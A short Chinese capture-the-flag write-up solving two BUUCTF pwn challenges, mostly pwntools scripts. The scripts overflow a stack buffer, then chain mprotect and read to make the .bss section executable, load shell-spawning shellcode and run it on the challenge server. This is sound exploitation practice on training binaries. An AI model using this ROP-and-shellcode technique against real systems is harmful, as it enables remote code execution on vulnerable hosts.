直接調用if里面的函數,但是本地可以通,遠程卻打不通
from pwn import * #r=remote('node3.buuoj.cn',25775) r=process('./get_started_3dsctf_2016') get_flag=0x80489b8 payload='a'*0x38+p32(get_flag) r.sendline(payload) r.interactive()
不過程序里面有mprotect函數,它可以修改程序內存里面的權限
int mprotect(const void *start, size_t len, int prot); #start是要修改的起始的內存地址 #len是修改的長度 #prot修改的權限
可以利用mprotect函數修改bss段的權限,讓其有執行權限,再用read寫入shellcode,然后跳轉到bss段執行來getshell
詳情步驟參考這里
from pwn import * context(arch='i386',os='linux') r=remote('node3.buuoj.cn',25775) elf=ELF('./get_started_3dsctf_2016') mprotect_addr=elf.symbols['mprotect'] read_addr=elf.symbols['read'] main_addr=elf.symbols['main'] ppp3_addr=0x080483b8 mpr_start=0x80eb000 mpr_len=0x1000 mpr_prot=7 #rxw=7 shellcode=asm(shellcraft.sh()) payload='a'*0x38 payload+=p32(mprotect_addr)+p32(ppp3_addr)+p32(mpr_start)+p32(mpr_len)+p32(mpr_prot) payload+=p32(read_addr)+p32(ppp3_addr)+p32(0x0)+p32(mpr_start)+p32(len(shellcode)) payload+=p32(mpr_start) r.sendline(payload) r.sendline(shellcode) r.interactive()
not_the_same_3dsctf_2016
一樣的配方,參數不一樣
from pwn import * context(arch='i386',os='linux') r=remote('node3.buuoj.cn',28393) elf=ELF('./not_the_same_3dsctf_2016') read_addr=elf.symbols['read'] mprotect_addr=elf.symbols['mprotect'] ppp3_ret=0x080483b8 mpr_start=0x080eb000 mpr_len=0x1000 mpr_prot=7 shellcode=asm(shellcraft.sh()) payload='a'*0x2d payload+=p32(mprotect_addr)+p32(ppp3_ret)+p32(mpr_start)+p32(mpr_len)+p32(mpr_prot) payload+=p32(read_addr)+p32(ppp3_ret)+p32(0x0)+p32(mpr_start)+p32(len(shellcode)) payload+=p32(mpr_start) r.sendline(payload) r.sendline(shellcode) r.interactive()